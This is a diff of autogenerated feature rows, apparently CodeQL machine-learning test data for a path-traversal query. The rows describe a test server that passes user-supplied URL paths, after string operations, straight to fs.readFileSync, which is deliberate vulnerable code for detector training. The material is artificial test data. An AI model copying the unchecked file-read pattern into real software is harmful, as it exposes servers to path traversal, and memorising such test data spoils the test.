autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | fs.read ... //)[i]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | fs.read ... //)[i]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | fs.read ... //)[i]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | fs.read ... //)[i]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:2:23:37 | fs.read ... //)[i]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:23:5:23:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:5:23:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:23:5:23:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:5:23:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:5:23:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:27 | path.split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:27 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:27 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:27 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:27 | path.split | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | exceptional return of path.split(/\\//) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | exceptional return of path.split(/\\//) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | exceptional return of path.split(/\\//) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | exceptional return of path.split(/\\//) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | exceptional return of path.split(/\\//) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | calleeImports | fs | @@ -11475,6 +87839,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:23:23:23:27 | split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:23:23:27 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:23:23:23:27 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:23:23:27 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:23:23:27 | split | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:23:29:23:32 | /\\// | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/tainted-string-steps.js:23:29:23:32 | /\\// | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:23:29:23:32 | /\\// | calleeImports | url | @@ -11484,6 +87853,56 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:23:29:23:32 | /\\// | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:23:29:23:32 | /\\// | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:23:29:23:32 | /\\// | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:23:35:23:35 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:23:35:23:35 | i | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:23:35:23:35 | i | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:23:35:23:35 | i | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:23:35:23:35 | i | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | exceptional return of fs.read ... ?")[0]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | exceptional return of fs.read ... ?")[0]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | exceptional return of fs.read ... ?")[0]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | exceptional return of fs.read ... ?")[0]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | exceptional return of fs.read ... ?")[0]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | fs.read ... ?")[0]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | fs.read ... ?")[0]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | fs.read ... ?")[0]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | fs.read ... ?")[0]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:2:24:36 | fs.read ... ?")[0]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:24:5:24:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:5:24:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:24:5:24:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:5:24:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:5:24:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:27 | path.split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:27 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:27 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:27 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:27 | path.split | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | exceptional return of path.split("?") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | exceptional return of path.split("?") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | exceptional return of path.split("?") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | exceptional return of path.split("?") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | exceptional return of path.split("?") | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | path.split("?") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | path.split("?") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | path.split("?") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | path.split("?") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:32 | path.split("?") | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | calleeImports | fs | @@ -11493,6 +87912,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:24:23:24:27 | split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:23:24:27 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:24:23:24:27 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:23:24:27 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:23:24:27 | split | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:24:29:24:31 | "?" | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/tainted-string-steps.js:24:29:24:31 | "?" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:24:29:24:31 | "?" | calleeImports | url | @@ -11502,6 +87926,56 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:24:29:24:31 | "?" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:24:29:24:31 | "?" | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:24:29:24:31 | "?" | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:24:34:24:34 | 0 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:24:34:24:34 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:24:34:24:34 | 0 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:24:34:24:34 | 0 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:24:34:24:34 | 0 | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | exceptional return of fs.read ... wn)[i]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | exceptional return of fs.read ... wn)[i]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | exceptional return of fs.read ... wn)[i]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | exceptional return of fs.read ... wn)[i]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | exceptional return of fs.read ... wn)[i]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | fs.read ... wn)[i]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | fs.read ... wn)[i]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | fs.read ... wn)[i]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | fs.read ... wn)[i]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:2:25:40 | fs.read ... wn)[i]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:25:5:25:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:5:25:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:25:5:25:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:25:5:25:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:25:5:25:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:25:18:25:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs 